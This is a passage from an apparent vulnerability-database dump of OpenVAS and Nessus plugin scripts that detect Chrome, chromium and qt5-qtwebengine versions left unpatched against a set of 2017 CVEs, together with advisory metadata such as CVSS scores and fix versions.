Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811873\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\",\n \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5130\",\n \"CVE-2017-5131\", \"CVE-2017-5133\", \"CVE-2017-15386\", \"CVE-2017-15387\",\n \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\",\n \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\");\n script_bugtraq_id(101482);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-19 12:40:22 +0530 (Thu, 19 Oct 2017)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An input validation error in MHTML.\n\n - Multiple heap overflow errors in Skia, WebGL and libxml2.\n\n - Multiple use after free errors in PDFium and WebAudio.\n\n - An incorrect stack manipulation in WebAssembly.\n\n - Multiple Out of bounds read and write errors in Skia.\n\n - UI spoofing in Blink.\n\n - Content security bypass.\n\n - Multiple URL spoofing errors in OmniBox.\n\n - An extension limitation bypass in Extensions.\n\n - An incorrect registry key handling in PlatformIntegration.\n\n - Referrer leak in Devtools.\n\n - URL spoofing in extensions UI.\n\n - Null pointer dereference error in ImageCapture.\n\n - Various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary script,\n conduct spoofing attack, corrupt memory, bypass security and cause\n denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 62.0.3202.62 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 62.0.3202.62 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"62.0.3202.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"62.0.3202.62\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:09:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2017-10-19T00:00:00", "id": "OPENVAS:1361412562310811874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811874", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-MAC OS X", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811874\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\",\n \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5130\",\n \"CVE-2017-5131\", \"CVE-2017-5133\", \"CVE-2017-15386\", \"CVE-2017-15387\",\n \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\",\n \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\");\n script_bugtraq_id(101482);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-19 12:40:22 +0530 (Thu, 19 Oct 2017)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2017-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An input validation error in MHTML.\n\n - Multiple heap overflow errors in Skia, WebGL and libxml2.\n\n - Multiple use after free errors in PDFium and WebAudio.\n\n - An incorrect stack manipulation in WebAssembly.\n\n - Multiple Out of bounds read and write errors in Skia.\n\n - UI spoofing in Blink.\n\n - Content security bypass.\n\n - Multiple URL spoofing errors in OmniBox.\n\n - An extension limitation bypass in Extensions.\n\n - An incorrect registry key handling in PlatformIntegration.\n\n - Referrer leak in Devtools.\n\n - URL spoofing in extensions UI.\n\n - Null pointer dereference error in ImageCapture.\n\n - Various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary script,\n conduct spoofing attack, corrupt memory, bypass security and cause\n denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 62.0.3202.62 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 62.0.3202.62 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"62.0.3202.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"62.0.3202.62\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15399", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-11-23T00:00:00", "id": "OPENVAS:1361412562310873734", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873734", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2017-f2f3fa09e3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_f2f3fa09e3_chromium_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for chromium FEDORA-2017-f2f3fa09e3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873734\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-23 08:11:49 +0100 (Thu, 23 Nov 2017)\");\n script_cve_id(\"CVE-2017-15398\", \"CVE-2017-15399\", \"CVE-2017-15386\", \"CVE-2017-15387\",\n \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\",\n \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\",\n \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\",\n \"CVE-2017-5133\", \"CVE-2017-5131\", \"CVE-2017-5130\", \"CVE-2017-5132\",\n \"CVE-2017-5129\", \"CVE-2017-5128\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2017-f2f3fa09e3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-f2f3fa09e3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZHJ5YIGBLXQL5X3CPAQPYZZZPLWA4447\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~62.0.3202.89~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-15417", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15409", "CVE-2017-15423", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15429", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15419", "CVE-2017-15399", "CVE-2017-15392", "CVE-2017-15425", "CVE-2017-15410", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-15422", "CVE-2017-15427", "CVE-2017-15407", "CVE-2017-15418", "CVE-2017-15411", "CVE-2017-5126", "CVE-2017-15412", "CVE-2017-15393", "CVE-2017-15415", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15426", "CVE-2017-15413", "CVE-2017-15408", "CVE-2017-15388", "CVE-2017-15416", "CVE-2017-15424", "CVE-2017-5129", "CVE-2017-15420", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-01-06T00:00:00", "id": "OPENVAS:1361412562310873977", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873977", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2017-ea44f172e3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_ea44f172e3_chromium_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for chromium FEDORA-2017-ea44f172e3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873977\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-06 00:00:45 +0100 (Sat, 06 Jan 2018)\");\n script_cve_id(\"CVE-2017-15412\", \"CVE-2017-15422\", \"CVE-2017-15407\", \"CVE-2017-15408\",\n \"CVE-2017-15409\", \"CVE-2017-15410\", \"CVE-2017-15411\", \"CVE-2017-15413\",\n \"CVE-2017-15415\", \"CVE-2017-15416\", \"CVE-2017-15417\", \"CVE-2017-15418\",\n \"CVE-2017-15419\", \"CVE-2017-15420\", \"CVE-2017-15423\", \"CVE-2017-15424\",\n \"CVE-2017-15425\", \"CVE-2017-15426\", \"CVE-2017-15427\", \"CVE-2017-15429\",\n \"CVE-2017-15398\", \"CVE-2017-15399\", \"CVE-2017-15386\", \"CVE-2017-15387\",\n \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\",\n \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\",\n \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\",\n \"CVE-2017-5133\", \"CVE-2017-5131\", \"CVE-2017-5130\", \"CVE-2017-5132\",\n \"CVE-2017-5129\", \"CVE-2017-5128\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2017-ea44f172e3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2017-ea44f172e3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TCX6RNONWP5H4F6S2D3GX2IVGKVND34L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~63.0.3239.108~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:10:51", "description": "An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-05T00:00:00", "title": "Fedora 26 : qt5-qtwebengine (2017-4d90e9fc97)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "modified": "2017-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-4D90E9FC97.NASL", "href": "https://www.tenable.com/plugins/nessus/105010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-4d90e9fc97.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105010);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\", \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\", \"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"FEDORA\", value:\"2017-4d90e9fc97\");\n\n script_name(english:\"Fedora 26 : qt5-qtwebengine (2017-4d90e9fc97)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-4d90e9fc97\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"qt5-qtwebengine-5.9.3-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:16", "description": "An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : qt5-qtwebengine (2017-15b815b9b7)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "modified": "2018-01-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine"], "id": "FEDORA_2017-15B815B9B7.NASL", "href": "https://www.tenable.com/plugins/nessus/105822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-15b815b9b7.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105822);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\", \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\", \"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"FEDORA\", value:\"2017-15b815b9b7\");\n\n script_name(english:\"Fedora 27 : qt5-qtwebengine (2017-15b815b9b7)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, 